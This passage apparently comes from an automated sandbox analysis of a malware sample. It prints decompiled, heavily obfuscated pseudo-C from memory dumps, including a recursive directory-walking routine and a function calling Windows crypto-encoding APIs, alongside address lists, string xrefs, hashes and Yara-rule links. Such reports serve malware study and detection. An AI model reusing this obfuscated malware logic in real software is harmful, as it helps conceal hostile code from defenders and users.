				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t131;
				void* _t148;
				void* _t151;
				signed int _t162;
				void* _t164;
				signed int* _t167;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0021602B(_t131);
				_v32 = 0x943f;
				_t167 =  &(( &_v64)[6]);
				_t164 = 0;
				_t151 = 0x349de80e;
				_t162 = 0x48;
				_v32 = _v32 * 0x69;
				_v32 = _v32 ^ 0x003ccdd6;
				_v56 = 0x5d22;
				_v56 = _v56 << 0xb;
				_v56 = _v56 * 0x6c;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 ^ 0x0003a52d;
				_v48 = 0xb9ad;
				_v48 = _v48 / _t162;
				_v48 = _v48 | 0x8e45101b;
				_v48 = _v48 ^ 0xce45129f;
				_v16 = 0x4535;
				_v16 = _v16 + 0xffff440f;
				_v16 = _v16 ^ 0xbfff8944;
				_v24 = 0xd710;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x000d4c75;
				_v44 = 0x65fd;
				_v44 = _v44 >> 2;
				_v44 = _v44 | 0x32207922;
				_v44 = _v44 ^ 0x322078de;
				_v28 = 0xded8;
				_v28 = _v28 ^ 0x86a01735;
				_v28 = _v28 ^ 0x86a0c6d1;
				_v64 = 0xdb93;
				_v64 = _v64 + 0x597e;
				_v64 = _v64 << 0xa;
				_v64 = _v64 << 0xa;
				_v64 = _v64 ^ 0x5110354e;
				_v60 = 0x2ada;
				_v60 = _v60 | 0x1c3e2a8f;
				_v60 = _v60 + 0xf49a;
				_v60 = _v60 ^ 0xe6209c52;
				_v60 = _v60 ^ 0xfa1f8dfc;
				_v20 = 0xdaa6;
				_v20 = _v20 + 0xb461;
				_v20 = _v20 ^ 0x0001dcca;
				_v40 = 0x4872;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0xb451885a;
				_v40 = _v40 ^ 0xb451b970;
				_v36 = 0x262e;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 + 0x6428;
				_v36 = _v36 ^ 0x00003c11;
				_v8 = 0x6e80;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x06e82b80;
				_v12 = 0x3e9d;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x00005153;
				_v52 = 0x8462;
				_v52 = _v52 ^ 0xcdf70fa2;
				_v52 = _v52 ^ 0xe5a9b23c;
				_v52 = _v52 | 0x26296c1d;
				_v52 = _v52 ^ 0x2e7f2e4a;
				do {
					while(_t151 != 0x6cb1230) {
						if(_t151 == 0x944062a) {
							_push(_t151);
							_push(_t151);
							_t164 = E00218736(_v4 + _v4);
							if(_t164 != 0) {
								_t151 = 0x6cb1230;
								continue;
							}
						} else {
							if(_t151 == 0x30a4ce3e) {
								_t148 = E002277A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
								_t167 =  &(_t167[7]);
								if(_t148 != 0) {
									_t151 = 0x944062a;
									continue;
								}
							} else {
								if(_t151 != 0x349de80e) {
									goto L11;
								} else {
									_t151 = 0x30a4ce3e;
									continue;
								}
							}
						}
						goto L12;
					}
					E002277A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
					_t167 =  &(_t167[7]);
					_t151 = 0x222ae378;
					L11:
				} while (_t151 != 0x222ae378);
				L12:
				return _t164;
			}

0x0022177a
0x0022177e
0x00221782
0x00221786
0x0022178a
0x0022178c
0x00221791
0x00221799
0x002217a3
0x002217a5
0x002217b6
0x002217b7
0x002217bb
0x002217c3
0x002217cb
0x002217d5
0x002217d9
0x002217de
0x002217e6
0x002217f9
0x002217fd
0x00221805
0x0022180d
0x00221815
0x0022181d
0x00221825
0x0022182d
0x00221832
0x0022183a
0x00221842
0x00221847
0x0022184f
0x00221857
0x0022185f
0x00221867
0x0022186f
0x00221877
0x0022187f
0x00221884
0x00221889
0x00221891
0x00221899
0x002218a1
0x002218a9
0x002218b1
0x002218b9
0x002218c1
0x002218c9
0x002218d1
0x002218d9
0x002218de
0x002218e6
0x002218ee
0x002218f6
0x002218fb
0x00221903
0x0022190b
0x00221913
0x00221918
0x00221920
0x00221928
0x0022192d
0x00221935
0x0022193d
0x00221945
0x0022194d
0x00221955
0x0022195d
0x0022195d
0x00221963
0x002219c0
0x002219c1
0x002219ca
0x002219d0
0x002219d2
0x00000000
0x002219d2
0x00221965
0x00221967
0x002219a0
0x002219a5
0x002219aa
0x002219ac
0x00000000
0x002219ac
0x00221969
0x0022196f
0x00000000
0x00221975
0x00221975
0x00000000
0x00221975
0x0022196f
0x00221967
0x00000000
0x00221963
0x002219fc
0x00221a01
0x00221a04
0x00221a09
0x00221a09
0x00221a16
0x00221a1e

Strings

5E, xrefs: 0022180D
"], xrefs: 002217C3
x*", xrefs: 00221A04
"y 2, xrefs: 00221847
SQ, xrefs: 0022192D
~Y, xrefs: 00221877
(d, xrefs: 002218FB
x*", xrefs: 00221A09
rH, xrefs: 002218D1
uL, xrefs: 00221832

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
API String ID: 0-656425227
Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction ID: 276a6f1b0c688db2c6fd0f47aafc6feb69b3d52dfb5f0a94d748239e687e544a
Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction Fuzzy Hash: 48612171109342AFD354CF64D89982BBBE1BBD5788F104A1DF69696260C3B5CA58CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10002730, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63encryptionmemoryCOMMON

Download Yara Rule

APIs

StgSerializePropVariant.PROPSYS(?,?,?,?,?,?,10002FCC,?,?), ref: 10002741
CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 10002761
CoTaskMemAlloc.OLE32(?), ref: 10002782
CryptBinaryToStringW.CRYPT32(?,?,40000001,00000000,?), ref: 100027AA
CoTaskMemFree.OLE32(00000000), ref: 100027CC
CoTaskMemFree.OLE32(?), ref: 100027D6

Strings

o, xrefs: 10002741

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Task$BinaryCryptFreeString$AllocPropSerializeVariant
String ID: o
API String ID: 207024522-3306556724
Opcode ID: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
Instruction ID: 41362f2d7e868ca1a04e6972f66fe0b1fe61006e645ec082c551d45625b46eb2
Opcode Fuzzy Hash: 00f394acfb645895ae8b55d7716a322e047d0b4f2a77fad1ab660e857ddb64e1
Instruction Fuzzy Hash: 1E114F7BD00129BBEB119BA4CC44EDE7BB9EF447A1F124162FD45E7224DB318E409AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00222B16, Relevance: 11.6, Strings: 9, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00222B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				signed int _v1636;
				unsigned int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				unsigned int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* __edx;
				void* _t314;
				signed int _t340;
				signed int _t342;
				signed int _t346;
				void* _t348;
				void* _t354;
				signed int _t358;
				void* _t360;
				void* _t389;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t408;
				void* _t409;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t314);
				_v1672 = 0x92f4;
				_t409 = _t408 + 0x1c;
				_t354 = 0x3181563a;
				_t400 = 0x5d;
				_v1672 = _v1672 / _t400;
				_v1672 = _v1672 ^ 0xa72c55b3;
				_v1672 = _v1672 ^ 0xa72c5437;
				_v1736 = 0x461f;
				_v1736 = _v1736 + 0xd353;
				_v1736 = _v1736 + 0xffff7400;
				_v1736 = _v1736 + 0xffff12e8;
				_v1736 = _v1736 ^ 0xffffeb08;
				_v1684 = 0x12ca;
				_v1684 = _v1684 + 0xffffbd30;
				_v1684 = _v1684 + 0xc084;
				_v1684 = _v1684 ^ 0x00009b25;
				_v1700 = 0x68fe;
				_v1700 = _v1700 >> 0x10;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000058ac;
				_v1676 = 0xc4c1;
				_v1676 = _v1676 + 0x377e;
				_v1676 = _v1676 + 0xffff6b29;
				_v1676 = _v1676 ^ 0x0000377c;
				_v1708 = 0x7055;
				_v1708 = _v1708 << 0xe;
				_v1708 = _v1708 ^ 0x1eb23ae3;
				_v1708 = _v1708 ^ 0x02a72f08;
				_v1648 = 0x750a;
				_v1648 = _v1648 | 0xec573941;
				_v1648 = _v1648 ^ 0xec5707ed;
				_v1744 = 0xfcbf;
				_t401 = 0x2c;
				_v1744 = _v1744 * 0x3d;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 / _t401;
				_v1744 = _v1744 ^ 0x00003058;
				_v1636 = 0x9933;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x0004b1ef;
				_v1668 = 0xb76d;
				_v1668 = _v1668 | 0xef4f757f;
				_v1668 = _v1668 ^ 0xef4ff671;
				_v1656 = 0xf145;
				_v1656 = _v1656 + 0x1194;
				_v1656 = _v1656 ^ 0x00010bb0;
				_v1752 = 0xf3e9;
				_t402 = 0x49;
				_v1752 = _v1752 / _t402;
				_v1752 = _v1752 + 0x9c03;
				_v1752 = _v1752 + 0xffffb211;
				_v1752 = _v1752 ^ 0x000027fb;
				_v1728 = 0x648a;
				_v1728 = _v1728 ^ 0x1010be16;
				_v1728 = _v1728 * 0x14;
				_v1728 = _v1728 | 0x258edfa9;
				_v1728 = _v1728 ^ 0x65dfe7b9;
				_v1688 = 0x4eab;
				_v1688 = _v1688 << 0xa;
				_v1688 = _v1688 | 0x3ca08384;
				_v1688 = _v1688 ^ 0x3dba9eb2;
				_v1756 = 0xd2f4;
				_t403 = 0x23;
				_v1756 = _v1756 / _t403;
				_v1756 = _v1756 ^ 0xcde225b2;
				_t404 = 0x6e;
				_v1756 = _v1756 / _t404;
				_v1756 = _v1756 ^ 0x01df76bd;
				_v1760 = 0x6cd1;
				_v1760 = _v1760 * 0x7d;
				_v1760 = _v1760 ^ 0x8e200a23;
				_v1760 = _v1760 >> 3;
				_v1760 = _v1760 ^ 0x11c2d811;
				_v1640 = 0xac3a;
				_v1640 = _v1640 >> 3;
				_v1640 = _v1640 ^ 0x00004856;
				_v1748 = 0x4fc2;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 * 0x31;
				_v1748 = _v1748 ^ 0x38a83a44;
				_v1748 = _v1748 ^ 0x38a82be9;
				_v1680 = 0xb86a;
				_v1680 = _v1680 | 0x02231922;
				_v1680 = _v1680 + 0xaf06;
				_v1680 = _v1680 ^ 0x022411a2;
				_v1644 = 0x3f39;
				_v1644 = _v1644 + 0xffff5bb9;
				_v1644 = _v1644 ^ 0xffffc632;
				_v1692 = 0xc5f9;
				_v1692 = _v1692 ^ 0xaafe79bc;
				_v1692 = _v1692 >> 0xf;
				_v1692 = _v1692 ^ 0x00013e0d;
				_v1740 = 0x58ed;
				_v1740 = _v1740 + 0xffff3fce;
				_v1740 = _v1740 * 0x34;
				_v1740 = _v1740 * 0x49;
				_v1740 = _v1740 ^ 0xfa04971a;
				_v1696 = 0xcc7a;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x00000d26;
				_v1732 = 0xc33a;
				_v1732 = _v1732 | 0xb66c57ae;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 * 0x56;
				_v1732 = _v1732 ^ 0xea449beb;
				_v1712 = 0xdae0;
				_v1712 = _v1712 >> 0xc;
				_v1712 = _v1712 ^ 0xc13d67df;
				_v1712 = _v1712 ^ 0xc13d455b;
				_v1716 = 0x5478;
				_v1716 = _v1716 | 0xa382055d;
				_v1716 = _v1716 * 0x26;
				_v1716 = _v1716 ^ 0x4558c259;
				_v1720 = 0xeafc;
				_v1720 = _v1720 + 0xffff5250;
				_v1720 = _v1720 ^ 0x4a0f2ed9;
				_v1720 = _v1720 ^ 0x4a0f1f8c;
				_v1664 = 0x8e28;
				_v1664 = _v1664 ^ 0x7b061f8d;
				_v1664 = _v1664 + 0xffffa0ec;
				_v1664 = _v1664 ^ 0x7b062de0;
				_v1724 = 0xce31;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 << 7;
				_v1724 = _v1724 << 5;
				_v1724 = _v1724 ^ 0xc4004273;
				_v1704 = 0xa554;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 * 0x35;
				_v1704 = _v1704 ^ 0x04475614;
				_v1660 = 0xb9dc;
				_v1660 = _v1660 + 0x9e03;
				_v1660 = _v1660 ^ 0x00011a8b;
				_v1652 = 0xf227;
				_t399 = _v1660;
				_v1652 = _v1652 / _t404;
				_v1652 = _v1652 ^ 0x00007d1f;
				while(1) {
					L1:
					_t389 = 0x2e;
					L2:
					while(_t354 != 0x2ecc014) {
						if(_t354 == 0xf8b22d1) {
							__eflags = _v1632 & _v1672;
							if(__eflags == 0) {
								_t340 = _a8( &_v1632, _a20);
								asm("sbb ecx, ecx");
								_t358 =  ~_t340 & 0x1c386f3a;
								L13:
								_t354 = _t358 + 0x2ecc014;
								while(1) {
									L1:
									_t389 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t389;
							if(_v1588 != _t389) {
								L20:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v1760);
									_t348 = E0022889D(0x22c0b0, _v1756, __eflags);
									_pop(_t360);
									E0021C680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
									E00222B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
									_t409 = _t409 + 0x30;
									_t346 = E00222025(_v1732, _t348, _v1712, _v1716);
									_t389 = 0x2e;
								}
								L19:
								_t354 = 0x1f252f4e;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L19;
							}
							__eflags = _v1586 - _t389;
							if(_v1586 != _t389) {
								goto L20;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L20;
							}
							goto L19;
						}
						if(_t354 == 0x1f252f4e) {
							_t342 = E0021595A(_v1720, _t399,  &_v1632, _v1664);
							asm("sbb ecx, ecx");
							_t358 =  ~_t342 & 0x0c9e62bd;
							__eflags = _t358;
							goto L13;
						}
						if(_t354 == 0x21983c19) {
							_push(_v1684);
							E00227BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E0022889D(0x22c090, _v1736, __eflags));
							_t346 = E00222025(_v1744, _t343, _v1636, _v1668);
							_t409 = _t409 + 0x20;
							_t354 = 0x3298743a;
							while(1) {
								L1:
								_t389 = 0x2e;
								goto L2;
							}
						}
						if(_t354 == 0x3181563a) {
							_t354 = 0x21983c19;
							continue;
						}
						if(_t354 != 0x3298743a) {
							L24:
							__eflags = _t354 - 0x2a8aa181;
							if(__eflags != 0) {
								continue;
							}
							L25:
							return _t346;
						}
						_t346 = E0021109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
						_t399 = _t346;
						_t409 = _t409 + 0x10;
						if(_t346 == 0xffffffff) {
							goto L25;
						}
						_t354 = 0xf8b22d1;
						goto L1;
					}
					E00211B5C(_v1724, _v1704, _v1660, _t399, _v1652);
					_t409 = _t409 + 0xc;
					_t354 = 0x2a8aa181;
					_t389 = 0x2e;
					goto L24;
				}
			}

0x00222b1f
0x00222b26
0x00222b2d
0x00222b34
0x00222b3b
0x00222b43
0x00222b44
0x00222b49
0x00222b54
0x00222b5d
0x00222b64
0x00222b69
0x00222b6f
0x00222b77
0x00222b7f
0x00222b87
0x00222b8f
0x00222b97
0x00222b9f
0x00222ba7
0x00222baf
0x00222bb7
0x00222bbf
0x00222bc7
0x00222bcf
0x00222bd4
0x00222bd9
0x00222be1
0x00222be9
0x00222bf1
0x00222bf9
0x00222c01
0x00222c09
0x00222c0e
0x00222c16
0x00222c1e
0x00222c29
0x00222c34
0x00222c3f
0x00222c4c
0x00222c4f
0x00222c53
0x00222c60
0x00222c64
0x00222c6c
0x00222c77
0x00222c7f
0x00222c8a
0x00222c92
0x00222c9a
0x00222ca2
0x00222caa
0x00222cb2
0x00222cba
0x00222cc6
0x00222cc9
0x00222ccd
0x00222cd5
0x00222cdd
0x00222ce5
0x00222ced
0x00222cfa
0x00222cfe
0x00222d06
0x00222d10
0x00222d18
0x00222d1d
0x00222d25
0x00222d2d
0x00222d3b
0x00222d40
0x00222d46
0x00222d52
0x00222d55
0x00222d59
0x00222d61
0x00222d6e
0x00222d72
0x00222d7a
0x00222d7f
0x00222d87
0x00222d92
0x00222d9a
0x00222da5
0x00222dad
0x00222db7
0x00222dbb
0x00222dc3
0x00222dcb
0x00222dd3
0x00222ddb
0x00222de3
0x00222deb
0x00222df6
0x00222e01
0x00222e0c
0x00222e14
0x00222e1c
0x00222e21
0x00222e29
0x00222e31
0x00222e3e
0x00222e47
0x00222e4b
0x00222e53
0x00222e5b
0x00222e60
0x00222e64
0x00222e6c
0x00222e74
0x00222e7c
0x00222e86
0x00222e8a
0x00222e92
0x00222e9a
0x00222e9f
0x00222ea7
0x00222eaf
0x00222eb7
0x00222ec4
0x00222ec8
0x00222ed0
0x00222ed8
0x00222ee0
0x00222ee8
0x00222ef0
0x00222ef8
0x00222f00
0x00222f08
0x00222f10
0x00222f18
0x00222f1f
0x00222f29
0x00222f2e
0x00222f36
0x00222f3e
0x00222f48
0x00222f4c
0x00222f54
0x00222f5c
0x00222f64
0x00222f6c
0x00222f7a
0x00222f7e
0x00222f82
0x00222f8a
0x00222f8a
0x00222f8c
0x00000000
0x00222f8d
0x00222f9f
0x002230a3
0x002230aa
0x00223193
0x0022319e
0x002231a0
0x00223094
0x00223094
0x00222f8a
0x00222f8a
0x00222f8c
0x00000000
0x00222f8c
0x00222f8a
0x002230b0
0x002230b8
0x002230e1
0x002230e1
0x002230e9
0x002230eb
0x002230f8
0x002230fd
0x0022312e
0x0022315f
0x00223164
0x00223175
0x0022317e
0x0022317e
0x002230da
0x002230da
0x00000000
0x002230da
0x002230ba
0x002230c3
0x00000000
0x00000000
0x002230c5
0x002230cd
0x00000000
0x00000000
0x002230cf
0x002230d8
0x00000000
0x00000000
0x00000000
0x002230d8
0x00222fa7
0x00223081
0x0022308c
0x0022308e
0x0022308e
0x00000000
0x0022308e
0x00222fb3
0x0022300c
0x00223044
0x0022305d
0x00223062
0x00223065
0x00222f8a
0x00222f8a
0x00222f8c
0x00000000
0x00222f8c
0x00222f8a
0x00222fbb
0x00223005
0x00000000
0x00223005
0x00222fc3
0x002231cc
0x002231cc
0x002231d2
0x00000000
0x00000000
0x002231e1
0x002231e1
0x002231e1
0x00222feb
0x00222ff0
0x00222ff2
0x00222ff8
0x00000000
0x00000000
0x00222ffe
0x00000000
0x00222ffe
0x002231bc
0x002231c1
0x002231c4
0x002231cb
0x00000000
0x002231cb

Strings

xT, xrefs: 00222EAF
X, xrefs: 00222E29
|7, xrefs: 00222BF9
sB, xrefs: 00222F2E
VH, xrefs: 00222D9A
&, xrefs: 00222E64
A9W, xrefs: 00222C29
Up, xrefs: 00222C01
9?, xrefs: 00222DEB

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
API String ID: 0-983689062
Opcode ID: 082c936c371fa2ab6479f4e7a8a31362bcf4feb3d5fa5164b0368112b3aeeb41
Instruction ID: d92c636ad2679169aaf29bade735363aa9959eaaa75f593f304e38e4a5213e8e
Opcode Fuzzy Hash: 082c936c371fa2ab6479f4e7a8a31362bcf4feb3d5fa5164b0368112b3aeeb41
Instruction Fuzzy Hash: 73F132715183819FD368CF61D549A5FBBE1FBC4308F108A1DF29A862A0D7B98A59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002188E5, Relevance: 11.5, Strings: 9, Instructions: 298
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E002188E5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _t325;
				short* _t331;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				short _t373;
				void* _t376;
				intOrPtr* _t380;
				void* _t382;

				 *(_t382 + 8) = 0xaa86;
				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
				 *(_t382 + 8) =  *(_t382 + 8) << 6;
				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
				 *(_t382 + 0x64) = 0xdd5d;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
				 *(_t382 + 0x74) = 0x57af;
				_t380 = __edx;
				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
				_t373 = 0;
				_t340 = 5;
				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
				_t376 = 0x1f5a6ea2;
				 *(_t382 + 0x68) = 0xf929;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
				 *(_t382 + 0x74) = 0x8254;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
				 *(_t382 + 0x48) = 0x274c;
				_t341 = 0x4c;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
				 *(_t382 + 0x7c) = 0x6684;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
				 *(_t382 + 0x40) = 0x1902;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
				 *(_t382 + 0x6c) = 0xb89b;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
				 *(_t382 + 0x14) = 0x3892;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
				 *(_t382 + 0x28) = 0xad3d;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
				 *(_t382 + 0x58) = 0xde2;
				_t342 = 0x39;
				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
				 *(_t382 + 0x1c) = 0xba82;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
				 *(_t382 + 0x40) = 0xa3d9;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
				 *(_t382 + 0x5c) = 0xecab;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
				 *(_t382 + 0x80) = 0x1387;
				_t343 = 0x2a;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
				 *(_t382 + 0x4c) = 0x7ada;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
				 *(_t382 + 0x90) = 0x1591;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
				 *(_t382 + 0x2c) = 0x3f89;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
				 *(_t382 + 0x98) = 0x7441;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
				 *(_t382 + 0x48) = 0x7f1e;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
				 *(_t382 + 0x8c) = 0x831c;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
				 *(_t382 + 0x30) = 0x92b6;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
				 *(_t382 + 0x28) = 0x1d89;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
				 *(_t382 + 0x58) = 0x126d;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
				 *(_t382 + 0x7c) = 0x1a69;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
				 *(_t382 + 0x20) = 0xff0b;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
				 *(_t382 + 0x6c) = 0xe12c;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
